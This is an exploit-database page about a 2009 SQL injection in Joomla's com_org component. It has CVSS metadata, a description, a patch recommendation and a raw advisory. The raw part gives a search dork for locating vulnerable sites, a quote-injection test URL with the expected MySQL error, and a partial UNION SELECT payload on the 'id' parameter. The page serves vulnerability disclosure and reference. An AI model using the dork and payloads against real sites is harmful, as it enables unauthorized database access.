header-logo
Suggest Exploit
vendor:
Joomla
by:
N2n-Hacker
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: 1.0
Affected Version To: 1.5.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla com_org SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla com_org component. An attacker can exploit this vulnerability to inject malicious SQL queries into the application and gain access to sensitive information from the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL queries to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

###############################################################################
##                                                                           ##
##          Joomla com_org SQL Injection Vulnerability                      ##
##                                                                           ##
###############################################################################
\\\\\\\\\\\\\\\\\\\\\\\\\\\N2n-Hacker - 2nd@live.fr////////////////////////////

*******************************************************************************
=> Dork = inurl:"option=com_org"

-------------------------------------------------------------------------------
# EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[SQLI] --&#9001;=en

Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"

# http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --&#9001;=en


********************************************************************************
                \\\\\\\\\\\\\\\\\\ BAD LIFE //////////////////

********************************************************************************